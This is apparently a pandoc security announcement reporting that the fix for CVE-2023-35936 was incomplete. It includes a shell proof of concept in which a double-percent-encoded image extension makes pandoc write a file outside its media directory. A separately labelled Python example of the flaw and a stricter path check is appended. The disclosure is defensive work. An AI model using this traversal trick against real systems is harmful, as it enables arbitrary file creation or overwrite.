From: John MacFarlane
Newsgroups: gmane.text.pandoc
Subject: ANN: fix to CVE-2023-35936 was incomplete
Date: Thu, 20 Jul 2023 11:56:41 -0700
Message-ID: <5966AA07-A6E3-4C0B-94EC-760BDEECDE3D@gmail.com>

Guilhem Moulin noticed that the fix in pandoc 3.1.4 to CVE-2023-35936 was incomplete.
An attacker could get around it by double-encoding the malicious extension to create or override arbitrary files.

$ echo '![](data://image/png;base64,cHJpbnQgImhlbGxvIgo=;.lua+%252f%252e%252e%252f%252e%252e%252fb%252elua)' >b.md
$ .cabal/bin/pandoc b.md --extract-media=bar

$ cat b.lua
print "hello"
$ find bar
bar/
bar/2a0eaa89f43fada3e6c577beea4f2f8f53ab6a1d.lua+

This vulnerability is fixed in the main branch of the repository:
https://github.com/jgm/pandoc/commit/eddedbfc14916aa06fc01ff04b38aeb30ae2e625

I will put out a new release soon.
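
An added example, not part of the original message and not pandoc's code: a Python model of why a check made after a single percent-decode pass accepts the extension from the reproduction above, next to a stricter check that decodes to a fixed point, allow-lists the extension and confirms the result stays inside the media directory. All function names and the `HASH` file stem are assumptions made for illustration.

```python
import os
import re
from urllib.parse import unquote

# Allow-list: a dot followed by a short run of ASCII letters or digits.
SAFE_EXT = re.compile(r"\.[A-Za-z0-9]{1,16}")

# Extension string taken from the reproduction in the message above.
POC_EXT = ".lua+%252f%252e%252e%252f%252e%252e%252fb%252elua"


def fully_decode(value, max_rounds=8):
    """Percent-decode until the value stops changing (bounded)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of percent-encoding")


def check_after_one_decode(ext):
    """Weak model: look for separators after a single decode pass."""
    once = unquote(ext)
    return "/" not in once and ".." not in once


def where_it_lands(media_dir, stem, ext):
    """Path that results if a later stage decodes again and joins blindly."""
    return os.path.normpath(os.path.join(media_dir, stem + fully_decode(ext)))


def media_path(media_dir, stem, ext):
    """Return a path inside media_dir, or raise ValueError."""
    ext = fully_decode(ext)
    if not SAFE_EXT.fullmatch(ext):
        raise ValueError("rejected extension: %r" % ext)
    root = os.path.realpath(media_dir)
    target = os.path.realpath(os.path.join(root, stem + ext))
    # Defence in depth: the resolved path must still be under the root.
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes media directory")
    return target
```
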